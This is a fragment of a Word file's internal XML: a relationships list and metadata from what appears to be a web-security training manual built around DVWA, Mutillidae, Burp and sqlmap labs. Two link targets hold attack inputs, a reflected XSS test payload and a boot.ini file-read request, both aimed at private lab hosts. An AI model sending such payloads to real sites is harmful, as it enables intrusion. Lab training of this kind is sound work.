Id="rId148" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image66.png"/><Relationship Id="rId169" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image86.png"/><Relationship Id="rId334" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image235.png"/><Relationship Id="rId355" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image254.png"/><Relationship Id="rId376" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image275.png"/><Relationship Id="rId397" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image296.jpe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30.png"/><Relationship Id="rId236" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image147.png"/><Relationship Id="rId257" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image163.png"/><Relationship Id="rId278" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image181.png"/><Relationship Id="rId401" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image300.jpeg"/><Relationship Id="rId422" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image321.png"/><Relationship Id="rId303" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image204.png"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://image.3001.net/images/20161031/14778955408376.png" TargetMode="External"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://image.3001.net/images/20161122/14798012126751.png" TargetMode="External"/><Relationship Id="rId138" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image60.png"/><Relationship Id="rId345" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image246.png"/><Relationship Id="rId387" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image286.jpeg"/><Relationship Id="rId191" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image108.png"/><Relationship Id="rId205" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image121.png"/><Relationship Id="rId247" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.python.org/downloads/release/python-2713/" TargetMode="External"/><Relationship Id="rId412" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image311.jpeg"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image47.jpeg"/><Relationship Id="rId289" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image191.emf"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.jpeg"/><Relationship Id="rId149" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/burp/freedownload/" TargetMode="External"/><Relationship Id="rId314" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image215.png"/><Relationship Id="rId356" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image255.png"/><Relationship Id="rId398" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image297.jpeg"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.153.130/dvwa/vulnerabilities/xss_r/?name=%3Cscript%3Ealert(/xss/)%3C%2Fscript%3E" TargetMode="External"/><Relationship Id="rId160" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image77.png"/><Relationship Id="rId216" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image131.png"/><Relationship Id="rId423" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image322.jpeg"/><Relationship Id="rId258" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image164.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.jpeg"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://image.3001.net/images/20161122/14797982626221.png" TargetMode="External"/><Relationship Id="rId118" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://image.3001.net/images/20161106/14784221284731.png" TargetMode="External"/><Relationship Id="rId325" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image226.png"/><Relationship Id="rId367" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image266.png"/><Relationship Id="rId171" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image88.png"/><Relationship Id="rId227" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image139.jpeg"/><Relationship Id="rId269" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image172.png"/><Relationship Id="rId434" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image333.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://image.3001.net/images/20161031/14778953244372.png" TargetMode="External"/><Relationship Id="rId129" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Mutillidae_2_Project" TargetMode="External"/><Relationship Id="rId280" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image183.png"/><Relationship Id="rId336" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image237.jpeg"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.jpeg"/><Relationship Id="rId140" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://10.180.184.30/mutillidae/index.php?page=user-info.php" TargetMode="External"/><Relationship Id="rId182" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image99.png"/><Relationship Id="rId378" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image277.png"/><Relationship Id="rId403" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image302.jpeg"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footnotes" Target="footnotes.xml"/><Relationship Id="rId238" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image149.png"/><Relationship Id="rId291" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image192.png"/><Relationship Id="rId305" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image206.png"/><Relationship Id="rId347" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image248.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://image.3001.net/images/20161016/14765776616648.png" TargetMode="External"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.freebuf.com/articles/web/120747.html" TargetMode="External"/><Relationship Id="rId151" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image68.png"/><Relationship Id="rId389" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image288.jpeg"/><Relationship Id="rId193" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image110.png"/><Relationship Id="rId207" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image123.png"/><Relationship Id="rId249" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://sqlmap.org/" TargetMode="External"/><Relationship Id="rId414" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image313.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId109" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://image.3001.net/images/20161108/14785912718652.png" TargetMode="External"/><Relationship Id="rId260" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.ussrback.com/docs/papers/IDS/whiskerids.html" TargetMode="External"/><Relationship Id="rId316" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image217.png"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.jpeg"/><Relationship Id="rId97" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image42.jpeg"/><Relationship Id="rId120" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.example.com/" TargetMode="External"/><Relationship Id="rId358" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image257.png"/><Relationship Id="rId162" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image79.png"/><Relationship Id="rId218" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image133.png"/><Relationship Id="rId425" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image324.jpeg"/><Relationship Id="rId271" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image174.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.jpeg"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://image.3001.net/images/20161122/14797982973459.png" TargetMode="External"/><Relationship Id="rId131" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image56.png"/><Relationship Id="rId327" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image228.png"/><Relationship Id="rId369" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image268.png"/><Relationship Id="rId173" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image90.png"/><Relationship Id="rId229" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image141.png"/><Relationship Id="rId380" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image279.png"/><Relationship Id="rId436" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image335.png"/><Relationship Id="rId240" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image151.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://image.3001.net/images/20161031/14778953704168.png" TargetMode="External"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.jpeg"/><Relationship Id="rId100" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://image.3001.net/images/20161223/14824827533689.png" TargetMode="External"/><Relationship Id="rId282" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image185.png"/><Relationship Id="rId338" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image239.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.baidu.com/link?url=08rxZKSQQl0ipMoHcv7nRh3avUAdqqQ8jwGkF0KIqZ3&amp;wd=&amp;eqid=99a51a4a000024530000000257fa08f5" TargetMode="External"/><Relationship Id="rId142" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image62.png"/><Relationship Id="rId184" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image101.png"/><Relationship Id="rId391" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image290.jpeg"/><Relationship Id="rId405" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image304.jpeg"/><Relationship Id="rId251" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image157.png"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://image.3001.net/images/20161016/14765776761898.png" TargetMode="External"/><Relationship Id="rId293" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image194.png"/><Relationship Id="rId307" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image208.png"/><Relationship Id="rId349" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image250.png"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image38.jpeg"/><Relationship Id="rId111" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://image.3001.net/images/20161106/14784220172185.png" TargetMode="External"/><Relationship Id="rId153" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image70.png"/><Relationship Id="rId195" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image112.png"/><Relationship Id="rId209" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image124.png"/><Relationship Id="rId360" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image259.png"/><Relationship Id="rId416" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image315.png"/><Relationship Id="rId220" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:8183/" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.csdn.net/whatday/article/details/60955403" TargetMode="External"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.jpeg"/><Relationship Id="rId262" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject1.bin"/><Relationship Id="rId318" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image219.png"/><Relationship Id="rId99" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image43.jpeg"/><Relationship Id="rId122" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image53.jpeg"/><Relationship Id="rId164" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image81.png"/><Relationship Id="rId371" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image270.png"/><Relationship Id="rId427" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image326.jpeg"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.jpeg"/><Relationship Id="rId231" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.hillstonenet.com.cn" TargetMode="External"/><Relationship Id="rId273" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image176.png"/><Relationship Id="rId329" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image230.png"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://image.3001.net/images/20161122/14797983399413.png" TargetMode="External"/><Relationship Id="rId133" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image57.png"/><Relationship Id="rId175" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image92.jpeg"/><Relationship Id="rId340" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image241.png"/><Relationship Id="rId200" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image116.png"/><Relationship Id="rId382" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image281.png"/><Relationship Id="rId438" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId242" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image153.png"/><Relationship Id="rId284" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image187.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://dwz.cn/" TargetMode="External"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image34.jpeg"/><Relationship Id="rId102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://image.3001.net/images/20161108/14785910509354.png" TargetMode="External"/><Relationship Id="rId144" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://mp.weixin.qq.com/s?__biz=MzU0NTI4MDQwMQ==&amp;mid=2247483663&amp;idx=1&amp;sn=6304e1469f23c33728ab5c73692b675e" TargetMode="External"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image39.jpeg"/><Relationship Id="rId186" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image103.png"/><Relationship Id="rId351" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://10.180.187.10/boot.ini" TargetMode="External"/><Relationship Id="rId393" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image292.jpeg"/><Relationship Id="rId407" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image306.png"/><Relationship Id="rId211" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image126.png"/><Relationship Id="rId253" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image159.png"/><Relationship Id="rId295" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image196.png"/><Relationship Id="rId309" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image210.png"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://image.3001.net/images/20161110/1478762521859.png" TargetMode="External"/><Relationship Id="rId113" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://image.3001.net/images/20161106/14784220488447.png" TargetMode="External"/><Relationship Id="rId320" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image221.png"/><Relationship Id="rId155" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image72.png"/><Relationship Id="rId197" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://localhost://8834" TargetMode="External"/><Relationship Id="rId362" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image261.png"/><Relationship Id="rId418" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image317.jpeg"/><Relationship Id="rId222" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image136.png"/><Relationship Id="rId264" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image167.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.csdn.net/whatday/article/details/60955403" TargetMode="External"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.153.130/dvwa/vulnerabilities/captcha/" TargetMode="External"/><Relationship Id="rId124" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://image.3001.net/images/20161108/14785913093285.png" TargetMode="External"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://image.3001.net/images/20161122/14797983721114.png" TargetMode="External"/><Relationship Id="rId166" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image83.png"/><Relationship Id="rId331" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image232.png"/><Relationship Id="rId373" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image272.png"/><Relationship Id="rId429" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image328.jpeg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../customXml/item1.xml"/><Relationship Id="rId233" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image144.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.jpeg"/><Relationship Id="rId275" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image178.png"/><Relationship Id="rId300" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2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C160-BB1D-420A-80E0-C7B35B22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218</Pages>
  <Words>15816</Words>
  <Characters>90152</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>751</Lines>
  <Paragraphs>211</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>10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iao</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>jbliao</cp:lastModifiedBy>
  <cp:revision>23</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-11-14T06:35:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-12-01T01:42:00Z</dcterms:modified>
</cp:coreProperties>
</file>